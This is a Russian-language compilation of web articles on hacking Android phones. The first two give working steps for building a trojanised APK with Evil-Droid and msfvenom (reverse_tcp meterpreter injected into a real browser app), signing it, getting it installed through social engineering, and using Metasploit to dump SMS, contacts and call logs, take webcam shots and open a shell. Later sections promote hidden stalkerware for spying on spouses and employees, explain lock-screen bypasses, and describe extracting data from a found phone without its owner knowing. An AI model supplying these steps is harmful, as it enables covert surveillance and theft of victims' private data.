Содержание

Взлом андроид смартфонов

Взлом андроид смартфонов – тема нашего обсуждения. Сегодня многие думают о том, чтобы взломать смартфон, удалённо прослушивать разговоры, просматривать смс-ки и самое интересное – смотреть через вебку. Взлом игр, приложений на андроид был доступен уже очень давно, чуть ли не с первых версий. Точнее сказать, тогда это было возможно, но не так популярно.

Начнём с того, что андроид является ОС на базе ядра Linux, а это много чего означает. Все возможности, которые у вас есть на десктопной версии, есть и на андроид смартфонах. Тут дело в удобстве.

Мы уже публикавали статью, где рассказали о самых популярных приложениях для взлома и тестирования безопасности на андроид.

Взлом андроид смартфона не сложнее чем взлом операционной системы, будь-то Linux или Windows. Всегда можно загрузить вредоносное приложение, через которое мы откроем бэкдор и сможем войти в систему удалённо. Есть также возможность прослушивать телефон через открытые порты. Таким вариантом мы сегодня и воспользуемся.

Давайте разберемся, что нам для этого понадобится:

  • Скрипт Evil-Droid;
  • Открытый порт;
  • ПК с установленным Kali Linux или загрузочная флешка.

Взлом андроид смартфонов – установка и запуск компонентов

Скачиваем архив или копируем его через терминал в необходимое место.

git clone ссылка на скрипт

Далее переходим в папку и даём права на исполнение файлу evil-droid

chmod +x evil-droid

Запускаем скрипт и генерируем вредоносный apk с бэкдором

sh evil-droid

Генерировать можно как файл под номером 2, так и 3. Я пользуюсь третьим, версия подойдёт для андроид устройств с более хорошей безопасностью. Для смартфонов с версией андроид 3-5 подойдёт и 2 пункт.

Перед нами появилось меню для настройки apk, которым мы будем пользоваться для взлома андроид.

Пункты, которые нам нужно настроить:

  • ip-адрес – на выбор локальный и глобальный, используйте глобальный, если атакуемый смартфон будет не у вас в локальной сети.
  • set lport – установка порта, тут вы можете выбрать любой, главное чтобы он был открыт. Иначе прослушать смартфон не получится. Как просканировать порты в вашей сети – читать.
  • Метод прослушки – я рекомендую использовать android/meterpreter/reverse_tcp, так как мы будем использовать metasploit для управления.
  • Выбор папки, куда будет сгенерирован вредоносный apk.
  • Генерация вредоносного apk.

Всё сделано. Для того, чтобы произошел взлом андроид смартфона и вы могли им управлять, необходимо установить evilapk на атакуемый смартфон. Тут методов много и придётся использовать СИ.

Далее мы запускаем скрипт ещё раз и выбираем пункт – start listening. Зараженный смартфон появиться в списке и в открытом окне появится возможность ввести команды управления. Для того, чтобы получить их список воспользуйтесь параметром –help или -h(идентичны).

Помните эти важные слова в наше время:

Ни одна система не является безопасной

Можете посмотреть галерею скриншотов для лучшего восприятия.

Если вам понравилась статья, поддержите нас поделившись ею в социальных сетях, а также подпишитесь на обновления сайта.

31.05.2017

Как взломать смартфон?

В статье описывается процесс, с помощью которого хакер может взломать смартфон жертвы, используя набор простых инструментов операционной системы Кали Линукс. И сегодня разберём один из способов того, как злоумышленник может взломать смартфон, находящийся под управлением операционной системы Андроид. Причём благодаря автоматизации некоторых процессов и при должной сноровке этот процесс можно поставить прямо-таки на поток.

Как взломать смартфон: лаборатория хакера.

  • Компьютер под управлением Кали Линукс Rolling
  • Смартфон под управлением Андроид
  • Невнимательный пользователь

Что хакер сможет сделать?

С помощью этого способа злоумышленник получит возможность:

  • читать смс
  • номера набранных телефонов
  • включать камеры устройства и просматривать видео в режиме он-лайн
  • определять текущее местоположение с большой точностью (в случае, если жертва использует Wi-Fi для выхода в сеть)
  • управлять устройством с помощью shell-команд (копировать, создавать и удалять файлы)

Как взломать смартфон: этапы взлома

Весь процесс разбивается на несколько этапов:

  • выбор оригинального приложения-жертвы
  • генерация пэйлоуда – декомпиляция двух файлов (созданного пэйлоуда и оригинального приложения .apk) – инжектирование файлов пэйлоуда в приложение – инжектирование специальных возможностей пэйлоуда и необходимых для этого разрешений для полноценной работы метерпретера
  • размещение заражённого приложения и удалённая с ним работа

Как видите самый смак лежит во втором, самом объёмном пункте. Дело в том, что всё описанное в нём можно проделать с помощью инструментария Метасплойт единственной командой через msfvenom, а можно – вручную. Она – команда – появится чуть ниже, а пока детали подготовки и объяснение флагов.

Выбираем приложение.

Перед тем, как начать, хакеру необходимо определиться с искомым приложением, которое он будет заражать для последующей «раздачи». Дело здесь не столько в популярности выбираемого, сколько в УЖЕ ИМЕЮЩИХСЯ возможностях и разрешениях этой программы. Давая разрешение на установку программы на свой смартфон, пользователи всё чаще обращают внимание именно на действия, которые приложение будет осуществлять. Согласитесь, если программки для игры в шахматы или читалка кодов ошибок автомобилей будет иметь доступ к настройкам звонков и СМС, а также к камере смартфона, это насторожит любого внимательного пользователя.

Однако такое поведение очень даже характерно для другого рода утилит, в том числе системных. Речь идёт о всякого рода чистильщиках, ремонтных утилитах и, конечно, мобильных браузерах и мессенджерах. Скорее всего, хакер обратит свой взор именно в эту степь. Я для примера возьму набирающий популярность мобильный браузер Mercury (у него есть дурацкая особенность – он сидит в автозагрузке и запускается вместе с включением устройства, а хакеру это только на руку), предварительно скачав его apk модуль установщика. Он называется ilegendsoft.mercury.apk.

Как взломать смартфон: генерация пэйлоуда.

Главная команда, которая и создаст троянский код:

msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -x донор.apk -o заражённый.apk

-a dalvik — platform android – целью является платформа Андроид c архитектурой dalvik

Тип пэйлоуда. Обычно подбирается один из трёх типов пэйлоуда, которые по своему функционалу, в принципе, схожи. И все они входят в состав инструментария метерпретер из набора Метасплойт. Единственное их отличие — способ соединения с системой хакера. И выбирать будем из маленького списка:

  • reverse_tcp
  • reverse_https
  • reverse_http

IP адрес хакера. Если выбудете тренироваться на виртуальных площадках лаборатории, то есть смысл указать в качестве адреса локальный IP. У меня в статье будут фигурировать оба: локальный и глобальный адреса, так что вам лишь стоит набрать в Google команду what is my ip. IP адрес в локальной сети вам подскажет команда ifconfig. Оба адреса нам понадобятся, советую с этим моментом сразу определиться.

Порт. Выбираем любой, кроме реверсивных (80, например, не прокатит). Для работы в глобальной сети сразу необходимо позаботиться о пробросе портов. В статье о настройке троянской программы Dark Comet я пробросил с этой целью 1555 порт. Им и воспользуюсь в обоих экспериментах. Далее, настраиваем связку роутер – компьютер в опциях dst-nat (в разделе Переадресация портов в службе HTTP добавьте локальный адрес компьютера (из ответа на команду ifconfigв терминале Кали) в формате 192.168.Х.Х – всё зависит от версии вашего роутера):

IP-роутера:1555 -> 192.168.Х.Х:1555

по схеме:

Внешний IP (ХХХ.ХХХ.ХХХ.ХХХ):1555 -> Роутер -> Внутренний (192.168.Х.Х) IP:1555 -> Компьютер_хакера.

Донор. Как уже указал, это браузер Меркурий (Mercury) ilegendsoft.mercury.apk.

Заражённый. В качестве имени будет фигурировать именно то имя, которое жертве будет подсовываться в качестве реального. Так что вопрос с наименованием также следует продумать заранее. У меня он называется payload.apk. Далее. В Кали Линукс для работы нам не хватает одной маленькой библиотечки. Её и скачаем:

apt-get install zipalign

Итак, команда создания троянского приложения в моём случае принимает вид, в котором я и запускаю в терминале из директории с оригинальным apk:

msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST=глобальный-IP-адрес LPORT=1555 -x ilegendsoft.mercury.apk -o payload.apk

Готово. Результат вы можете увидеть в той же папке:

Чтобы приложение смогло установиться и запуститься, нам нужно задать ему подпись. И сначала сгенерируем хранилище ключей:

keytool -genkey -v -keystore trojan.keystore -alias trojan -keyalg RSA -keysize 2048 -validity 10000

Сейчас нам придётся пройти рутиную процедуру по  регистрации. Пишите, впрочем, что хотите:

сверху рисунка попались результаты работы пэйлоуда – будущему браузеру присваивались неограниченные права

А теперь и сама подпись (работаем всё в той же папке, применявшиеся ранее имена папок и фалов я выделил жирным):

jarsigner -verbose -keystore trojan.keystore -storepass 123456 -keypass 123456 -digestalg SHA1 -sigalg MD5withRSA payload.apk trojan

Как взломать смартфон: работа с троянским приложением.

Антивирус при установке молчит. Установка проходит незаметно, кроме, конечно, предупреждений о непонятно откуда взявшихся непомерных желаниях браузера. Жертва включает браузер и лезет в сеть.

В это время злоумышленник ждёт урожая. Заряжаем Метасплойт (порты в роутере проброшены?):

 use exploit/multi/handler
 set PAYLOAD android/meterpreter/reverse_tcp
 set LHOST 192.168.XXX.XXX
 set LPORT 1555
run

нажмите, чтобы увеличить

Запущена текущая сессия метерпретера. Теперь остаётся вспомнить или изучить основные команды метера и команды shell под Андроид. Что-то можно выудить прямо сейчас. Наберите в строке метерпретера:

help

и вы увидите быстрые команды. Что здесь есть:

Что хоть взломали-то такое:

sysinfo

Проверим список sms-сок:

meterpreter > dump_sms [*] Fetching 611 sms messages [*] SMS messages saved to: sms_dump_20170531121028.txt

Проверим список звонков ( на выходе вы увидите путь calllog_dump_20170531121133.txt – документ в папке root):

meterpreter > dump_calllog [*] Fetching 500 entries [*] Call log saved to calllog_dump_20170531121133.txt

Телефонные номера в книжке:

meterpreter > dump_contacts [*] Fetching 75 contacts into list [*] Contacts list saved to: contacts_dump_20170531122443.txt

Логи будут представлены в виде текстовых файлов:

Рутирован ли смартфон:

meterpreter > check_root [*] Device is not rooted

Сколько есть камер:

meterpreter > webcam_list 1: Back Camera 2: Front Camera

Фото на память (камеры можно выбирать):

meterpreter > webcam_snap [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/olutbmJh.jpeg

Запишем видео на память:

webcam_stream

На некоторых смартфонах пэйлоуд сам активирует геолокацию, у некоторых пользователей она всегда включена. Проверьте, где он сейчас находится – повезёт-не повезёт (один из моих заражённых смартфонов, работающих через Wi-Fi, определился с точностью до адреса дома):

wlan_geolocate

Наконец, для управления смартфоном наберём:

shell

Превентивные меры или как не попасться на удочку.

Из написанного понятны слабые места для тех, кто захочет вас отработать.

  • приложение должно попасть на смартфон и установиться. А значит, есть смысл не оставлять его где попало без присмотра. Иначе любое ваше любимое приложение будет работать против вас же
  • качаем приложения только из двух источников: разработчики и Google Play (там тоже много чего нехорошего замечено, но Google пытается контролировать ситуацию)
  • читайте, что собирается делать устанавливаемое приложение. Если требований к доступу очень уж много, стоит отказаться. Бесплатный сыр, знаете ли… он такой.

Успехов вам.

РубрикаLinuxАндроид Как сделать виртуальный диск из смартфона Как показывать секунды в часах в трее?

Как взломать телефон на расстоянии? Судя по количеству писем, которыми нас забрасывают с недавних пор, этот вопрос волнует очень многих. Кому это нужно?

  • Возможно, что родителям подростков. Как не волноваться, если у ребенка появились секреты и неизвестно что на уме. Удаленный мониторинг устройства был бы отличным решением.
  • Не доверяющим друг другу супругам, один из которых подозревает свою вторую половину в обмане.
  • Работодателям, которые считают, что работники используют рабочее время и предоставленный компанией телефон для личных нужд.

Конечно, интерес к взлому проявляют и другие. Но “любопытствующие” из вышеперечисленных 3-х групп  составляют значительное  большинство.

Прежде, чем бросаться в омут шоппинга, изучите рынок, убедитесь, что у выбранного вами софта безупречная репутация, это не контрафакт и ему можно довериться.

А чтобы не ошибиться и сделать правильный выбор, вооружитесь знаниями из этой статьи.

В ней мы поименно перечислим 6 лучших приложений для мониторинга устройства, чуть подробнее поговорим об их возможностях. И самое главное – мы покажем вам, как взламывать телефон на расстоянии.

1. Cocospy – приложение N1 для взлома телефона

Cocospy дебютировал на рынке шпионского софта относительно недавно, но уже успел сделать себе имя, став приложением N1 для мониторинга телефонов.

Это абсолютно легальное и надежное ПО, завоевавшее доверие миллионов пользователей по всему миру.

Cocospy не требуется рутирование, поскольку доступ обеспечивается удаленно и напрямую с панели управления  iCloud. В случае с Android нужен физический доступ и инсталляция Cocospy на телефон. Но и тут “захват устройства” возможен без root-прав.

Через приложение вы можете контролировать активность в соцсети, а чтобы увидеть его в действии, протестируйте онлайн демо-версию Cocospy здесь >>

Сразу после установки на Android подчищаем следы, удаляя значок Cocospy. Приложение становится невидимым, но от этого не перестает делать свою работу “на отлично”. К тому же, чтобы не раскрыть себя, Cocospy не тянет энергию из батарей. Все! Android – ваш.

Преимущества Cocospy:

  • GPS-трекинг: С Cocospy, вы можете выяснить точное местоположение целевого телефона на основе данных  GPS, а также ознакомиться с историей и маршрутом перемещений.
  • Geofencing: С ее помощью осуществляется настройка «безопасной» и «опасной» зон. Когда телефон входит или выходит из одной из этих областей, вы сразу же получаете уведомление.
  • Мониторингсоцсетей: Посредством Cocospy вы получаете полный доступ к  профилям соцсетей и приложений, таких как  WhatsApp, Instagram, Facebook Messenger, Skype, Snapchat и т.д.
  • Кейлоггер: От его “всевидящего ока” не ускользнет ни одно нажатие клавиши. Как результат, все пароли целевого телефона будут ваши.

Из менее популярных, но тоже важных опций можно выделить “перехват телефонных звонков”, “текстовых сообщений”, “просмотр истории браузера” и т.д.

Как взломать телефон удаленно?

1. Создайте учетную запись Cocospy.

ВАЖНО! Cocospy– единственное в своем роде шпионское приложение, которому не нужны  root-права для получения доступа  к целевому устройству.

2. Для внедрения в систему  iPhone вам нужно лишь авторизоваться в iCloud.

3. В случае с Android просто начните инсталляцию шпиона.

4. После установки удалите/скройте значок Cocospy на телефоне.

5. Перейдите на панель управления  Cocospy,  чтобы иметь доступ к нужным функциям, расположенным в левой части.

Бесплатно зарегистрируйтесь в Cocospy или протестируйте онлайн демо-версию здесь >>

2. mSpy – приложение N2 для взлома телефона

mSpy – серебряный призер среди шпионских приложений для взлома устройств. Надежен, вызывает только позитивные отклики, обладает мощным функционалом для работы.

Что важно, внедрение  в целевой телефон не требует  проведения джейлбрейка/рутинга. Однако если возникло желание взломать iPhone без root-прав, придется “добывать” логин и пароль от чужого аккаунта iCloud.

Возникли сложности с mSpy ? К вашим услугам круглосуточная служба поддержки клиентов.  Хотите получить доступ к расширенным функциям без проведения рутинга, но не знаете, как это сделать? Звоните в сервисный центр. По телефону вам  вкратце объяснят весь процесс.

Если не уверены, что справитесь с установкой mSpy самостоятельно, тогда обращайтесь  в  “mAssistance”, чтобы заказать услуги специалиста на дом.

Как только инсталляция шпионского ПО на целевой телефон завершена, удалите значок mSpy.

Что дает нам mSpy ?

  1. Кейлоггер: Отслеживает  все нажатия клавиш, включая пароль. Добыв его, вам остается лишь авторизоваться и…взять контроль над целевым телефоном в свои руки.
  2. GeoFencing: С ее помощью осуществляется настройка «безопасной» и «опасной» зон. Когда телефон входит или выходит из одной из этих областей, вы сразу же получаете уведомление.
  3. Мониторинг соцсетей: Через  mSpy вы можете получить прямой доступ к аккаунтам  соцсетей и мессенджеров, таких как Facebook, Snapchat, Viber, WhatsApp, Skype и т.д. У вас появится возможность читать все отправленные,  полученные или удаленные сообщения, контролировать активность “объекта слежки”  в соцсетях.

Все вышеперечисленные функции mSpy относятся к категории “расширенных”. Заполучить их можно, купив пакет Premium, либо проведя рутинг/джейлбрейк целевого телефона.

В альтернативе, вы сможете лишь перехватывать звонки, определять местоположение устройства на базе данных  GPS, следить за электронной перепиской и ряд еще других действий.

Как скрытно и анонимно взломать чужой телефон на расстоянии?

  1. Приобретите mSpy. Если вы готовы довольствоваться базовым набором опций или не хотите “добывать” root-права, покупайте пакет “Basic”. Чтобы получить доступ к расширенным функциям, придется приобретать пакет “Premium”.
  2. Получив на свой email письмо со ссылкой, перейдите по ней на панель управления и выберите опцию «с джейлбрейк» или «без джейлбрейк».
  3. «Без джейлбрейк». Введите Apple ID и пароль, чтобы проникнуть в чужой iPhone. В случае с Android нужен физический доступ для инсталляции mSpy  в нем.
  4. «С джейлбрейк»: Следуя пошаговой инструкции, установите приложение на устройство. В случае затруднений воспользуйтесь услугами “mAssistance”.
  5. Как только все будет готово, не забудьте скрыть значок mSpy.
  6. Теперь перейдите на панель управления mSpy и начинайте мониторинг целевого устройства.

Посмотреть отзывы о mSpy  или попробовать  онлайн демо-версию здесь >>

3. Как взломать телефон с помощью Spyzie?

Spyzie  завоевал бронзу, уступив I и  II место приложениям Cocospy и mSpy, поскольку не так надежен, имеет меньше положительных отзывов, не особо прост в использовании, зато легко обходится без root-прав.

К тому же, есть еще одна особенность, которая выделяет Spyzie  из общей “толпы шпионов”. Сразу после установки на целевой телефон его значок самоустраняется.

Все остальные шпионские приложения требуют удаления той самой иконки вручную. Представьте, что вы забыли скрыть ее. Вас тут же раскроют и операция по взлому будет провалена.

А вот особая “невидимость” Spyzie полностью исключает возможность ошибки, вызванной человеческим фактором, что еще больше повышает его рейтинг популярности.

Если вам неудобно управлять вашими шпионами с компьютера, Spyzie предлагает мобильные приложения для Android и  iPhone.

Преимущества Spyzie:

  1. Установить временные ограничения: Задействовав функцию “родительский контроль” , можно установить временные ограничения, чтобы дети могли пользоваться телефоном только в определенные часы.
  2. Мониторинг соцсетей: Вы получите полный доступ к профилям соцсетей и мессенджеров, таких как Facebook, Instagram, Snapchat, сможете отслеживать всю переписку, причем вместе с датой и временем, а также все медиа-файлы.
  3. Geofencing: С ее помощью осуществляется настройка «безопасной» и «опасной» зон. Когда телефон входит или выходит из одной из этих областей, вы сразу же получаете уведомление.
  4. Перехват звонков и текстовых сообщений: Благодаря этой опции вы будете знать с кем контактирует целевой пользователь, когда он это делает и как долго длится общение.

Помимо вышеперечисленных опций, входящих в категорию “продвинутые”, есть и другие, не менее привлекательные.  Большинство из них доступны без root-прав и лишь некоторая  часть требует проведения рутинга/джейлбрейка.

Как взломать телефон на расстоянии, воспользовавшись другим телефоном?

  1. Пройдите по ссылке spyzie.com и создайте учетную запись.
  2. Введите требуемые данные целевого телефона.
  3. «Без рутинга/джейлбрейка”: Авторизуйтесь в iCloud (для  iPhone) или просто установите Android приложение на целевой телефон (для Android).
  4. «С джейлбрейк/рутированием»: Загрузите и установите приложение, прежде взломав корневую систему.
  5. Теперь вы можете удаленно контролировать телефон через другой мобильник.

Просмотреть отзывы о Spyzie  или попробовать онлайн демо-версию  здесь>>

4. Как взломать телефон посредством hoverwatch?

hoverwatch– один из дешевых и отлично зарекомендовавших себя шпионов для отслеживания телефонов. Имеет все стандартные функции, которые вы ожидаете найти в ПО подобного рода.

Но есть один большой жирный минус: он работает только на устройствах Android. Зато можно делать выбор между “проводить рутинг/джейлбрейк”  или “не проводить”

Преимущества hoverwatch:

  • GPS-трекинг: С помощью интерактивной GPS -карты вы можете отследить текущее местоположение целевого устройства или проверить маршрут его перемещений за день.
  • Мониторинг WhatsApp: Эта опция позволит вам быть в курсе всех разговоров WhatsApp, следить за обменом медиа-файлов. Вы даже можете “разбудить” камеру для скрытого снятия скриншотов или отслеживать  WhatsApp-звонки.

Как взломать телефон на расстоянии с помощью другого мобильника?

  1. Создайте аккаунт
  2. Загрузите приложение hoverwatch и установите его на целевой телефон.
  3. Перейдите на панель управления hoverwatch для мониторинга контролируемого устройства.

Прочитать отзывы о hoverwatch  или посетить официальный веб-сайт здесь >>

5. FlexiSPY – приложение N5 для взлома телефона

FlexiSPY – один из наиболее продвинутых и надежных “хакеров” с впечатляющим набором функций и очень высокой ценой.  Даже базовый пакет  FlexiSPY стоит намного дороже, нежели самый продвинутый пакет другого приложения.

Снижает рейтинг его популярности и необходимость проведения джейлбрейка, без которого не будет доступа ни к расширенным, ни к базовым функциям софта.

Преимущества FlexiSPY:

  1. Прослушивание телефонных разговоров: FlexiSPY позволяет вам скрытно подключиться к контролируемому телефону, прослушать весь разговор и даже записать его.
  2. Скрытая фотосъемка: Благодаря этой опции вы всегда будете в курсе того, чем занят “объект опеки”. Более того,  активизировав камеру, вы сможете вести скрытую фотосъемку внешних объектов.
  3. Слушать наружные звуки: Вы можете “разбудить” встроенный микрофон и слушать ведущиеся вблизи целевого устройства разговоры.

Удаленный мониторинг телефона с другого мобильника

  1. Определитесь, какой пакет FlexiSPY выбрать: Premium или Extreme.
  2. Проведите рутинг/джейлбрейк телефона и установите на него  FlexiSPY.
  3. Перейдите на панель управления FlexiSPY и установите контроль над целевым устройством.

Просмотреть отзывы о FlexiSPY или попробовать онлайн демо-версию здесь >>

6. iKeyMonitor – приложение N6 для взлома телефона

iKeyMonitor – один из эффективных шпионских приложений, с помощью которого можно удаленно внедриться как на iPhone, так и на Android. Наибольший ажиотаж  вокруг  приложения вызывают возможности  его кейлоггера.

К тому же, прежде, чем приобрести iKeyMonitor, вы можете протестировать пробную 3-дневную версию. 

Что делает iKeyMonitor таким особенным?

Изюминка iKeyMonitor – в его опции “кейлоггер”. В своей “прошлой жизни”, еще до того, как стать приложением для взлома, он был клавиатурным шпионом и “делал карьеру”, отслеживая любые  нажатия клавиш на целевом устройстве.

Получив на руки нужную информацию, можно было авторизоваться и брать под свой контроль профили соцсетей, отслеживать электронную переписку и много чего еще.

Как взломать мобильный телефон?

  1. Создайте учетную запись iKeyMonitor .
  2. Получите доступ к целевому устройству и перейдите на веб-сайт iKeyMonitor со своего аккаунта.
  3. Зайдите в “Загрузки” и выберите нужный вам файл с нужными параметрами. Все зависит от того, что вы собираетесь взламывать:  iPhone или  Android, а также будете ли вы проводить  рутинг/джейлбрейк или нет.
  4. Определившись в выбором, загрузите нужный файл и установите на контролируемом телефоне.  
  5. Дайте системе час, чтобы обновить всю информацию у вас на панели управления.
  6. Зайдите на iKeyMonitor с вашего гаджета или компьютера для мониторинга целевого телефона.

Прочитайте отзывы о iKeyMonitor или попробуйте  онлайн демо-версию здесь >>

Заключение

Теперь вы знаете как взломать телефон на расстоянии. Лично я бы рекомендовал воспользоваться для этого надежным, вызывающим доверие и не требующим рутинга приложением Cocospy. С другой стороны, остальные шпионские ПО не менее эффективны.

В любом случае, последнее слово за вами. Мы надеемся, что благодаря этой статье вы поняли, как проводить удаленный мониторинг телефона. Если у вас есть какие-то вопросы, пожалуйста, пишите нам в комментариях.

Этот пост также доступен на других языках: English (Английский)Português (Португальский, Бразилия)日本語 (Японский)Español (Испанский)

Что делать, если забыл пароль от телефона? Как разблокировать андроид? Не стоит волноваться, существует несколько способов возобновить доступ к своему мобильному устройству. В этой статье можно найти основные варианты того, сбросить блокировку, как самые простые, так и более сложные, требующие дополнительных программ. Один из этих способов обязательно поможет решить проблему с заблокированным телефоном.

Данные аккаунта

Простой способ, как разблокировать андроид, если забыл пароль, – восстановить доступ с помощью гугл-аккаунта. Этот метод сработает только в том случае, если планшет или телефон подключены к Wi-Fi либо мобильной сети. Это механизм самой системы, помогающий в случае неправильного ввода пароля или графического ключа.

Если ввести графический ключ неправильно более пяти раз, то появится окошко с предупреждением о тридцатисекундной блокировке. На экране устройства появится надпись «Забыли графический ключ?», при нажатии на которую вам будет предложено ввести данные своего гугл-аккаунта. После того как вы введете адрес своей почты и пароль, устройство разблокируется.

Если вы забыли данные своего аккаунта, то восстановите их на официальном сайте гугл.

Если отсутствует подключение к интернету

Первый способ, показывающий, как разблокировать андроид, если забыл пароль, не сработает при отсутствии интернета, так как логин и пароль от гугл-аккаунта будет невозможно проверить. Необходимо установить подключение к интернету.

Для этого нужно включить и выключить или просто перезагрузить устройство. Сразу же после включения появится верхний бар (его называют также центром уведомлений, или информационным центром). Потяните его вниз и включите Wi-Fi или мобильный интернет. После этого можно ввести свои логин и пароль, и устройство будет разблокировано.

Если рядом нет Wi-Fi, а мобильный интернет недоступен на вашей сим-карте, можно поступить следующим образом. Просто воспользуйтесь другой сим-картой, заранее обратите внимание, подключена ли услуга «Интернет» и есть ли деньги на балансе.

Подключить устройство к сети интернет можно и с помощью LAN-переходника. Для этого понадобится сам переходник и роутер, подключенный к интернету. Устройство подключается к интернету с помощью переходника, что позволит проверить правильность введенных данных гугл-аккаунта. Следует знать, что не все устройства поддерживают работу через LAN-переходник.

Для старых версий

Третий способ, рассказывающий нам, как разблокировать экран андроид, если забыл пароль, скорее всего, не подойдет для версий выше 2.3. Нужно просто позвонить на заблокированное устройство и ответить на звонок. После этого можно зайти в настройки и просто отключить блокировку графическим ключом.

Способ с разряженной батареей

Четвертый метод, показывающий, как разблокировать планшет андроид, если забыл пароль, основан на сообщении о разряде батареи. Он подойдет и для телефона. Дождитесь, пока батарея не разрядится, устройство оповестит вас об этом. Тогда можно будет войти в меню состояния питания, оттуда проследовать в основное меню и отключить защиту с помощью графического ключа.

Отключение блокировки через компьютер

Пятый способ сработает, если включена отладка по USB. Эту функцию можно включить в меню «Для разработчиков». Если она была включена до блокировки, то отключить защиту графическим ключом будет легко.

Все последующие способы, рассказывающие, как разблокировать андроид, если забыл пароль, основаны на удалении файла gesture.key, который содержит данные о ключе. Сначала скачайте и установите на компьютер программу ADB Run. После этого можно подключить телефон или планшет к компьютеру.

Чтобы понять, как разблокировать планшет андроид, если забыл пароль, прочтите следующую инструкцию.

Запустите программу «ADB Run». Управление в программе осуществляется с помощью цифровых клавиш и кнопки «Enter». Теперь следует зайти в меню и выбрать шестой по счету пункт, называющийся «Unlock Gesture Key».

Разблокировка через меню Recovery

Несколько методов разблокирования графического ключа основано на удалении файла gesture.key вручную. Чтобы использовать эти способы, нужно, чтобы на устройстве было меню Recovery.

Шестой способ. Скачайте файловый менеджер Aroma и установите его с помощью меню Recovery. Теперь перейдите по пути /data/system/ и вручную удалите файл gesture.key. Теперь устройство можно перезагрузить. Введите любой графический ключ — и экран разблокируется.

Седьмой метод похож на шестой. Скачайте файл gest.zip для андроида, установите его из меню Recovery и перезагрузите устройство. Теперь можно ввести любой графический ключ, и андроид разблокируется.

Обращение в сервисный центр

Если вы не в ладах с техникой, не забывайте, что можно обратиться в сервисный центр. Мастер сможет решить вашу проблему за несколько минут. В сложных случаях поможет перепрошивка устройства.

Сброс данных

Есть ещё один, девятый способ разблокировать телефон или планшет с помощью «рекавери», но подойдет он не всем. Дело в том, что в устройствах есть функция возвращения к заводским настройкам. При таком сбросе данных фотографии, видео, картинки, музыка и другие файлы останутся без изменений. Но СМС, телефонная книга со всеми контактами, программы и заметки будут удалены. Рекомендуется внести все свои контакты в гугл-аккаунт, чтобы в подобных случаях иметь возможность их восстановить.

Для того чтобы вернуться к заводским настройкам с помощью меню «рекавери», нужно выключить устройство (желательно и на несколько секунд вытащить батарею), войти в режим «рекавери» и выбрать пункт меню, который называется «Wipe Data / Factory Reset». Навигация по меню осуществляется клавишей громкости, выбор — клавишей питания. Через некоторое время телефон самостоятельно перезагрузится (в некоторых моделях перезагрузку нужно выполнить вручную) и будет разблокирован. Не все знают, как пользоваться меню «рекавери», поэтому подробно рассмотрим этот способ на примере разных моделей телефонов.

Samsung

Как разблокировать андроид, если забыл пароль? «Самсунг» позволяет сбросить ключ при помощи меню Recovery.

Сначала выключите устройство. Одновременно нажмите и удерживайте три кнопки – «Домой», «Питание» и «Увеличение громкости» (если кнопка «Домой» отсутствует, то нужно нажимать только две последних). Удерживайте клавиши до появления меню. С помощью клавиши громкости выберите пункт «wipe data/factory reset», после чего нажмите клавишу питания, таким же образом выберите «yes — Delete all user data» в появившемся меню. Перезагрузите устройство, выбрав пункт «reboot system now».

НТС

Как разблокировать андроид HTC, если забыл пароль? Выключите смартфон, если есть возможность, то вытащите и вставьте батарею. Зайдите в меню Recovery, удерживая кнопку выключения и кнопку уменьшения громкости. Отпустить кнопки, когда появится изображение андроида. В меню нужно выбрать пункт Factory Reset (в некоторых моделях он называется Clear Storage).

LG

Как разблокировать андроид LG, если забыл пароль? Выключите телефон, зажмите кнопку питания и кнопку регулировки громкости. Появится изображение андроида. Выберите Recovery Mode с помощью кнопки громкости и подтвердите выбор клавишей выключения. Снова появится изображение андроида. Теперь выбирайте «Settings», после – «Factory Data Reset», подтвердите решение, выбрав «Yes».

Fly

Как разблокировать андроид, если забыл пароль? Fly позволяет отключть графический ключ при сбросе данных.

Выключите смартфон, вытащите и вставьте батарею. Вход в меню осуществляется с помощью кнопку выключения и повышения громкости. Сначала выберите «recovery mode», затем«wipe data/factory reset» и «Yes». Перезагрузите устройство, выбрав «reboot system now».

Сброс блокировки с помощью приложения

Наконец, десятый, последний метод сброса графического ключа. Этот способ прост, но для его применения следует заранее подумать, как разблокировать андроид, если забыл пароль. То есть, по сути, ещё до самой блокировки. Для использования необходимы Root-права.

Скачайте и установите приложение SMS Bypass, разрешите ему использование Root-прав. Теперь, чтобы разблокировать смартфон, достаточно послать на него сообщение с текстом «1234 reset». Текст можно самостоятельно изменить.

Если устройство уже заблокировано, то при включенном интернете установить приложение можно удаленно через свой гугл-аккаунт.

Представим себе следующую ситуацию. Мы находим смартфон под управлением Android 4.1–4.4 (ну или CyanogenMod 10–11) и вместо того, чтобы вернуть его хозяину, решаем оставить себе и вытащить из него всю конфиденциальную информацию, которую только сможем. Все это мы попытаемся сделать без специализированных инструментов вроде различных систем для прямого снятия дампа с NAND-памяти или хардварных устройств для снятия S-ON и так, чтобы владелец не узнал о том, что мы делаем, и не смог удаленно отыскать или заблокировать устройство. Сразу оговорюсь, что все это вовсе не руководство к действию, а способ исследовать безопасность смартфонов и дать информацию тем, кто хочет уберечь свои данные.

WARNING!

Вся информация предоставлена исключительно в ознакомительных целях. Ни автор, ни редакция не несут ответственности за любой возможный вред, причиненный материалами данной статьи.

Итак, нам в руки попал чужой смартфон. Не важно, каким образом, важно, что он уже у нас. Первое, что мы должны сделать, — это как можно быстрее отвязать его от сотовой сети, то есть, следуя завету гопников, вынуть и выкинуть SIM-карту. Однако делать это я бы рекомендовал только в том случае, если SIM-карту удастся вынуть, не выключая смартфон, то есть либо осторожно приподняв батарею, либо через боковой слот, если это смартфон с несъемной батареей (Nexus 4/5, например). Во всех остальных случаях лучше ограничиться включением режима полета, так как вполне возможно, что в Android активирован режим шифрования пользовательских данных и после отключения смартфон будет заблокирован до ввода ключа шифрования.

Также ни в коем случае нельзя подключать смартфон к какой бы то ни было сети Wi-Fi, так как, возможно, установленное на нем ПО для отслеживания (а в Android 4.4.1 оно уже встроено) сразу начнет свою работу и можно нарваться на «случайную» встречу с владельцем и его друзьями (о полиции можно не беспокоиться, она такого пострадавшего пошлет). Фронтальную камеру я бы на всякий случай чем-нибудь заклеил, возможно, она делает снимки уже сейчас и они будут отправлены при первом удобном случае.

Теперь, когда мы обезопасили свою персону, можно начать раскопки. Первое препятствие, которое нам придется обойти, — это экран блокировки. В 95% случаев он не будет иметь защиты, однако об остальных пяти процентах мы забывать не можем.

